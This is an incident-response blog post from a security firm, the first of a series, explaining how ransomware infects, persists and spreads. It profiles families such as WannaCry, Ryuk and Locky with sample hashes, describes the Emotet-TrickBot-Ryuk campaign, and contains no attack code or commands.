Skip to Main Content
October 28, 2019

Incident Response Ransomware Series: Part 1

Written by TrustedSec
Incident Response Incident Response & Forensics

In this three-part blog post series, we will provide an introduction into what ransomware is, how it works, and how it spreads to systems within an organization. We will also provide examples of different types of ransomware and variation of ransomware tactics.

In part two, we will go in-depth to understand the various attack vectors ransomware uses, as well as ways to detect, protect, and prevent ransomware. In part three, we will identify ransomware variants and sites used for identification. We will also touch on the various recovery options and answer the big question—should you pay the ransom?

What is Ransomware?

Ransomware is a class of malicious software designed to extort money from users by disabling the functionality of important computer systems or by encrypting files on the infected device as well as shared or networked drives.

Infection Kill Chain

Typically, most ransomware exhibit similar behaviors during infection. While part two of this blog series will cover ransomware attack vectors and the attack kill chain, in this section, we will X-ray the chain of events that occurs during infection.

Once the victim downloads a dropper (a program designed to install malware to a target system), the infection begins. We will examine the various infection stages and collectively identify its infection kill chain.

  • Malware Download: When the system is infected with a dropper, there is a command and control (C2) communication to download a malicious executable. The dropper then copies the malicious executable to a local directory, or in some cases, it injects the malicious code into a running process.
  • Persistence Method: The ransomware attempts to create persistence mechanisms using various methods, the most common of which are described below:
    • Creates Run and RunOnce registry keys
    • Copies itself into %UserProfile%/Start Menu\Programs\Startup or %USER%\appdata\roaming
    • Uses Scheduled tasks
  • Enumeration: Once the ransomware has established a persistence mechanism, it would enumerate the local system, network system, and even cloud systems, searching for files of interest.
  • Encryption: At this stage, the ransomware begins to encrypt the enumerated files. It encrypts the file, copies the encrypted version to the original location, and then deletes the original file. After encryption, the attacker leaves a ransom note demanding payment.

How it Spreads

While the most common method for spreading ransomware is through phishing emails, some variants have been seen spreading through other means. Various spreading mechanisms of ransomware include:

  • Spam emails
  • Exploit kits
  • Removable media
  • Drive-by downloads
  • Malware campaigns
  • Lateral movement using SMB
  • Web-based messaging applications
  • Deployed by another malware, such as TrickBot

Variations of Ransomware

Gone are the days when important computer system functionality is disabled or files are encrypted only on the infected device. With recent variations of ransomware, a lot could be done using various modules. These ransomware variants can:

  • Encrypt Master Boot Record (MBR)
  • Delete files if the victim takes too long to make the ransom payment
  • Restrict access to files and data but will not encrypt them (known as non-encrypting ransomware)
  • Exfiltrate data to a threat actor (known as extortionware), which is normally accompanied by a threat to leak or publish the data/files if the ransom is not paid
  • Rename file extensions

Ransomware Samples

With over 30 active malware families, ransomware has been on the rise since the last decade. From the AIDS malware in 1989, Winlock in 2010, Locky in 2016, and even the recent Ryuk, we have seen a great increase in the number of impacted systems by various variants of ransomware. A few of these ransomware samples are:

  • WannaCry: First seen in 2017, this malware infected over 100,000 organizations in 150 countries. Using an EternalBlue exploit, WannaCry ransomware exploits a vulnerability in the Windows implementation of the Server Message Block (SMB) protocol—a protocol that helps various nodes on a network communicate.
    Sample:  043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2
  • Teslacrypt: When Teslacrypt emerged in 2015, it began infection using exploit kits. Victims were redirected to a compromised site where the Nuclear exploit kit was installed. Its infection chain looks identical to another ransomware called CryptoLocker.
    Sample:  83e62221df7ba94f18fc9b63fec82285d8694c0c0a2542c0196752dc81524a10
  • Ryuk: Similar to Hermes ransomware, Ryuk was first spotted in 2018 and was used to target enterprise environments. Dubbed as one of the most sophisticated types of ransomware, Ryuk can shut down over 40 processes and around 180 services, including anti-virus, backup, and other programs. It is also capable of deleting all the shadow copies of the various backup files on a targeted machine.
    Sample:  11f70be9ad30802f7a8d48197e5e4353fc537f6b13ae7c5164fff60a4a51b2ed
  • Cerber: In 2016, the name Cerber ransomware began making waves. This ransomware variant targets cloud-based Office 365 users and has infected millions.
    Sample:  6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27 
  • Locky: First seen in 2016, this ransomware locks the victim’s computer with a .locky extension and prevents usage until a ransom is paid. An invoice-themed phishing email with a macro-enabled document usually kicks off the infection chain once the victim opens the attachment.
    Sample:  ff3e29a31f05016dedcd61a7aac588757c8364f04fa85b7a86196c9805cd811c
  • SamSam: One ransomware that operates in a targeted fashion is the SamSam ransomware. This ransomware has been known to target healthcare organizations. Its method of operation is to gain access to an organization’s network, spend time performing reconnaissance, then attempt to encrypt as many files as possible.
    Sample:   2f294d301d8bb9b947f41faf20df104710d5c4b2f469145d4e469ca7d1998b2f
  • Jigsaw: This ransomware was known for its ability to start deleting files if the ransom was not paid within 72 hours.
    Sample:  07955541315b1c376269b5081a25f277ae162c0a8612511c9aa65504df722d76
  • Sodinokibi: This ransomware exploited vulnerabilities in servers and other critical assets of SMBs. In some instances, the ransomware searches for an AV called Ahnlab in the infected machine to inject its malicious payload. Similarities in the code suggest that this ransomware was created by the same group as the GandCrab ransomware.
    Sample:  139a7d6656feebe539b2cb94b0729602f6218f54fb5b7531b58cfe040f180548
  • Sorebrect: This fileless ransomware variant targets the Windows Operating System and is distributed through open remote desktop protocol (RDP) ports by brute-forcing administrator credentials. Once access to the targeted server is obtained, the malicious actor installs Sorebrect using PsExec. Once installed, it injects malicious code into the Windows svchost.exe process while its primary binary self-terminates.
    Sample:  4142ff4667f5b9986888bdcb2a727db6a767f78fe1d5d4ae3346365a1d70eb76

Triple Threat

Is ransomware always the beginning of the attack? Absolutely not. As ransomware continues to evolve and get sophisticated, attackers are now utilizing these ransomware samples for even more sophisticated malware campaigns. A great example is the combination of Emotet, TrickBot, and Ryuk ransomware, as demonstrated in many of the recent government ransomware attacks, including one that hit 22 cities and towns in Texas ( and another that affected Georgia’s court system (

In this three-phased malware campaign, the first phase begins with the Emotet trojan. Emotet is a banking trojan that can steal financial information and credentials, and is often used as a downloader or dropper for other malware. It starts off with a Microsoft Office document containing malicious macro-based code delivered through a phishing email. Once the victim opens the document, the malicious document runs and executes a PowerShell command. The PowerShell command then attempts to download and execute the Emotet payload from different malicious domains.

The second phase begins with Emotet using its delivery mechanism to drop and execute TrickBot, another banking trojan that uses code injection and redirects to steal financial information. It can spread laterally and deploy other tools and ransomware. When TrickBot infects the user’s system, it uses various modules and attempts to do the following:

  • Acquire credentials from the user’s machine
  • Disable AV services (this terminates the service if it finds specific DLs in memory)
  • Inject into online banking activities to obtain credentials
  • Steal Bitcoin wallets
  • Search disk for specific files
  • Harvest user credentials from multiple saved locations (Outlook, browsers, RDP, VNC, etc.)
  • Launch additional malware. In most cases, this becomes the ransomware.

The third and final phase begins when TrickBot is used to download the Ryuk ransomware payload. Using the stolen credentials, it moves laterally to a desired target, injects the malicious payload, and encrypts the files. In our investigations, we have also seen threat actors manually deploy Ryuk onto critical systems within a victim’s environment using RDP or remote execution tools such as PsExec.


As we have seen thus far, knowledge of ransomware capabilities is essential to any organization. Its infection kill chain, the way it spreads, and the numerous samples and variants are a great way to stay ahead of the game.

In the next part of this blog series, we will go in-depth into understanding the various attack vectors, ransomware detection, protection, and prevention.


Ready for Part Two? Read "Incident Response Ransomware Series: Part 2" now!